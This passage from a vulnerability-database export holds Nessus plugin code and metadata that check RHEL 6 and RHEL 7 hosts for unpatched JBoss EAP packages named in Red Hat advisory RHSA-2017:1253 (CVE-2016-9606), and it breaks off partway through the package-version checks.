(rpm_check(release:\"RHEL6\", reference:\"jboss-as-jsf-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jsr77-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-logging-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-mail-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-management-client-content-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-messaging-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-modcluster-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-naming-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-network-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-osgi-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-osgi-configadmin-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-osgi-service-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-picketlink-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-platform-mbean-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-pojo-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-process-controller-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-protocol-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-remoting-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-sar-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-security-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-server-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-system-jmx-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-threads-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-transactions-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-version-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-web-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-webservices-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-weld-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-xts-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-ejb-client-1.0.39-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-security-negotiation-2.3.13-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-xnio-base-3.0.16-1.GA_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-appclient-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-bundles-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-core-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-domain-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-javadocs-7.5.15-3.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-modules-eap-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-product-eap-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-standalone-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossas-welcome-content-eap-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jbossweb-7.5.22-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"picketbox-4.1.5-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"picketlink-bindings-2.5.4-14.SP12_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"picketlink-federation-2.5.4-14.SP12_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"resteasy-2.3.19-1.Final_redhat_1.1.ep6.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"hibernate4-core-eap6 / hibernate4-eap6 / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:42", "description": "An update is now available for Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.14, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* It was discovered that under certain conditions RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker could possibly use this flaw execute arbitrary code with the permissions of the application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for reporting these issues.", "cvss3": {}, "published": "2018-09-04T00:00:00", "type": "nessus", "title": "RHEL 7 : JBoss EAP (RHSA-2017:1253)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9606"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:hibernate4-core-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-entitymanager-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-envers-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-infinispan-eap6", "p-cpe:/a:redhat:enterprise_linux:hornetq", "p-cpe:/a:redhat:enterprise_linux:httpserver", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-api-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-impl-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-spi-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-api-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-impl-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-deployers-common-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-jdbc-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-spec-api-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-validator-eap6", "p-cpe:/a:redhat:enterprise_linux:jboss-as-appclient", "p-cpe:/a:redhat:enterprise_linux:jboss-as-cli", "p-cpe:/a:redhat:enterprise_linux:jboss-as-client-all", "p-cpe:/a:redhat:enterprise_linux:jboss-as-clustering", "p-cpe:/a:redhat:enterprise_linux:jboss-as-cmp", "p-cpe:/a:redhat:enterprise_linux:jboss-as-configadmin", "p-cpe:/a:redhat:enterprise_linux:jboss-as-connector", "p-cpe:/a:redhat:enterprise_linux:jboss-as-controller", "p-cpe:/a:redhat:enterprise_linux:jboss-as-controller-client", "p-cpe:/a:redhat:enterprise_linux:jboss-as-core-security", "p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-repository", "p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-scanner", "p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-http", "p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-management", "p-cpe:/a:redhat:enterprise_linux:jboss-as-ee", "p-cpe:/a:redhat:enterprise_linux:jboss-as-ee-deployment", "p-cpe:/a:redhat:enterprise_linux:jboss-as-ejb3", "p-cpe:/a:redhat:enterprise_linux:jboss-as-embedded", "p-cpe:/a:redhat:enterprise_linux:jboss-as-host-controller", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jacorb", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxr", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxrs", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jdr", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jmx", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jpa", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jsf", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jsr77", "p-cpe:/a:redhat:enterprise_linux:jboss-as-logging", "p-cpe:/a:redhat:enterprise_linux:jboss-as-mail", "p-cpe:/a:redhat:enterprise_linux:jboss-as-management-client-content", "p-cpe:/a:redhat:enterprise_linux:jboss-as-messaging", "p-cpe:/a:redhat:enterprise_linux:jboss-as-modcluster", "p-cpe:/a:redhat:enterprise_linux:jboss-as-naming", "p-cpe:/a:redhat:enterprise_linux:jboss-as-network", "p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi", "p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-configadmin", "p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-service", "p-cpe:/a:redhat:enterprise_linux:jboss-as-picketlink", "p-cpe:/a:redhat:enterprise_linux:jboss-as-platform-mbean", "p-cpe:/a:redhat:enterprise_linux:jboss-as-pojo", "p-cpe:/a:redhat:enterprise_linux:jboss-as-process-controller", "p-cpe:/a:redhat:enterprise_linux:jboss-as-protocol", "p-cpe:/a:redhat:enterprise_linux:jboss-as-remoting", "p-cpe:/a:redhat:enterprise_linux:jboss-as-sar", "p-cpe:/a:redhat:enterprise_linux:jboss-as-security", "p-cpe:/a:redhat:enterprise_linux:jboss-as-server", "p-cpe:/a:redhat:enterprise_linux:jboss-as-system-jmx", "p-cpe:/a:redhat:enterprise_linux:jboss-as-threads", "p-cpe:/a:redhat:enterprise_linux:jboss-as-transactions", "p-cpe:/a:redhat:enterprise_linux:jboss-as-version", "p-cpe:/a:redhat:enterprise_linux:jboss-as-web", "p-cpe:/a:redhat:enterprise_linux:jboss-as-webservices", "p-cpe:/a:redhat:enterprise_linux:jboss-as-weld", "p-cpe:/a:redhat:enterprise_linux:jboss-as-xts", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb-client", "p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation", "p-cpe:/a:redhat:enterprise_linux:jboss-xnio-base", "p-cpe:/a:redhat:enterprise_linux:jbossas-appclient", "p-cpe:/a:redhat:enterprise_linux:jbossas-bundles", "p-cpe:/a:redhat:enterprise_linux:jbossas-core", "p-cpe:/a:redhat:enterprise_linux:jbossas-domain", "p-cpe:/a:redhat:enterprise_linux:jbossas-javadocs", "p-cpe:/a:redhat:enterprise_linux:jbossas-modules-eap", "p-cpe:/a:redhat:enterprise_linux:jbossas-product-eap", "p-cpe:/a:redhat:enterprise_linux:jbossas-standalone", "p-cpe:/a:redhat:enterprise_linux:jbossas-welcome-content-eap", "p-cpe:/a:redhat:enterprise_linux:jbossweb", "p-cpe:/a:redhat:enterprise_linux:picketbox", "p-cpe:/a:redhat:enterprise_linux:picketlink-bindings", "p-cpe:/a:redhat:enterprise_linux:picketlink-federation", "p-cpe:/a:redhat:enterprise_linux:resteasy", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2017-1253.NASL", "href": "https://www.tenable.com/plugins/nessus/112257", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1253. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112257);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2016-9606\");\n script_xref(name:\"RHSA\", value:\"2017:1253\");\n\n script_name(english:\"RHEL 7 : JBoss EAP (RHSA-2017:1253)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update is now available for Red Hat JBoss Enterprise Application\nPlatform 6.4 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15\nserves as a replacement for Red Hat JBoss Enterprise Application\nPlatform 6.4.14, and includes bug fixes and enhancements, which are\ndocumented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* It was discovered that under certain conditions RESTEasy could be\nforced to parse a request with YamlProvider, resulting in\nunmarshalling of potentially untrusted data. An attacker could\npossibly use this flaw execute arbitrary code with the permissions of\nthe application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for\nreporting these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-US/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:1253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9606\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-core-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-entitymanager-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-envers-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-infinispan-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hornetq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpserver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-impl-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-spi-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-impl-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-deployers-common-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-jdbc-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-spec-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-validator-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-appclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-client-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-clustering\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-cmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-configadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-connector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-controller-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-core-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-repository\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-scanner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-http\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-management\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ee-deployment\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ejb3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-host-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jacorb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxrs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jdr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jpa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jsr77\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-logging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-mail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-management-client-content\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-modcluster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-network\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-configadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-service\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-picketlink\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-platform-mbean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-process-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-protocol\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-sar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-system-jmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-threads\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-version\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-webservices\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-weld\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-xts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-xnio-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-appclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-javadocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-modules-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-product-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-standalone\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-welcome-content-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-bindings\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:1253\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL7\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-core-eap6-4.2.26-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-eap6-4.2.26-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-entitymanager-eap6-4.2.26-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-envers-eap6-4.2.26-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-infinispan-eap6-4.2.26-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hornetq-2.3.25-20.SP18_redhat_1.1.ep6.el7\")) flag++;\n 